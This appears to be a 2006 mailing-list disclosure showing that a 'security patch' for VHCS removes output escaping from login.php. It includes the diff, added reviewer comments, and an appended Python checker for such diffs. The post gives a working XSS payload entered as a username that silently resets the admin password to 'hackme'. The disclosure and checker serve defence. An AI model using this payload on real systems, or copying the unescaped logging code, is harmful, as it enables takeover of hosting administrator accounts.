Message-ID: <43E65B67.8000707@rs-labs.com>
Date: Sun Feb  5 20:09:32 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: VHCS Security Patch - 2006-02-05 --> Fake!


Hi,

I've just visited VHCS main page and noticed the following "security patch":

http://vhcs.net/new/modules/news/article.php?storyid=23

It reads:

"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php

Just replace the file
"

Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high-severity cross-site scripting issue!

See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php  --> login.php from "security patch"

roman@...labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
<               write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
>               write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
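Review bot: the `>` side drops the htmlspecialchars($uname, ENT_QUOTES, "UTF-8") wrapper around $uname before it is concatenated into the write_log() message, so a username typed at the login form reaches the log unescaped and is rendered wherever that log is displayed; the `<` line is the safe one and should be kept. The same removal is repeated in the 75c75, 104c104, 112c112, 190c190 and 199c199 hunks below.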
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---
>
write_log( $uname." Domain status is not OK - user can not login");
104c104
<                       write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
>                       write_log( $uname." user logged in.");
112c112
<               write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
>               write_log( $uname." bad password login data.");
190c190
<                       write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
>                       write_log($uname." user session timed out");
199c199
<               write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
>               write_log($uname." bad session data.");
258a259
>       die();
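Review bot: an unconditional `die();` is added after line 258 with no condition or context visible in the hunk and no explanation; a change billed as a security fix should not introduce a bare exit, so the surrounding code needs to be shown or the line dropped.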
261a263
> }
437c439
< }
---
> //}
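Review bot: commenting out the closing brace at line 437, together with the `}` added at 261a263, moves a block's end about 175 lines earlier, so everything between those points is no longer inside that block; this is a control-flow change unrelated to output escaping and should be justified or reverted.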
roman@...labs:~$


As you can see, the "patch" removes htmlspecialchars() calls, leaving
login.php vulnerable. Nasty...

If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry
page):

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>

When the VHCS admin enters the "Admin Log" page (in the VHCS menu)... his
password will be set to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is allowing a password
change without supplying the old one (Alex, please, fix it in the next
release!).

Summarizing, my recommendation: use VHCS 2.4.7.1 and don't apply the patch.

-- 

Cheers,
-Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
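An added check, not part of Roman's post or of VHCS, that a practitioner can run over a vendor diff before applying it: it parses classic (`38c38`-style) diff hunks and flags any hunk whose new side has fewer output-escaping calls than its old side, or that adds a bare die()/exit() or comments out a closing brace, which is exactly what the diff above shows. SAMPLE_DIFF is a constructed subset of the hunks quoted above with the archive's line wrapping undone; SANITIZERS and the function names are my own choices.

```python
import re
# Constructed sample: a subset of the hunks quoted in the post, with the lines
# the archive wrapped re-joined so that each diff line is whole again.
SAMPLE_DIFF = """38c38
<               write_log("Login error, <b><i>".htmlspecialchars($uname, ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
>               write_log("Login error, <b><i>".$uname."</i></b> unknown username");
104c104
<                       write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." user logged in.");
---
>                       write_log( $uname." user logged in.");
258a259
>       die();
437c439
< }
---
> //}
"""

# Output-escaping calls whose disappearance from a hunk is a red flag (assumed list).
SANITIZERS = ("htmlspecialchars(", "htmlentities(", "strip_tags(")
# Classic (non-unified) diff hunk header, e.g. 38c38, 258a259, 10,12d9.
HUNK_HEADER = re.compile(r"^\d+(?:,\d+)?[acd]\d+(?:,\d+)?$")


def parse_hunks(diff_text):
    """Split a classic diff into hunks, keeping the old ('<') and new ('>') lines."""
    hunks = []
    for line in diff_text.splitlines():
        if HUNK_HEADER.match(line):
            hunks.append({"header": line, "old": [], "new": []})
        elif hunks and line.startswith("< "):
            hunks[-1]["old"].append(line[2:])
        elif hunks and line.startswith("> "):
            hunks[-1]["new"].append(line[2:])
    return hunks  # the '---' separator carries no content and is skipped


def count_sanitizers(lines):
    return sum(line.count(s) for line in lines for s in SANITIZERS)


def dropped_sanitizers(diff_text):
    """Headers of hunks whose new side has fewer escaping calls than the old side."""
    return [h["header"] for h in parse_hunks(diff_text)
            if count_sanitizers(h["new"]) < count_sanitizers(h["old"])]


def suspicious_control_flow(diff_text):
    """Headers of hunks that add a bare die()/exit() or comment out a closing brace."""
    bad = lambda s: s.startswith(("die(", "exit(", "//}"))
    return [h["header"] for h in parse_hunks(diff_text)
            if any(bad(n.strip()) for n in h["new"])]
```

Run it as `dropped_sanitizers(open("vendor.diff").read())` against the output of `diff old.php new.php`; any flagged hunk deserves the kind of manual look Roman gave this one.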
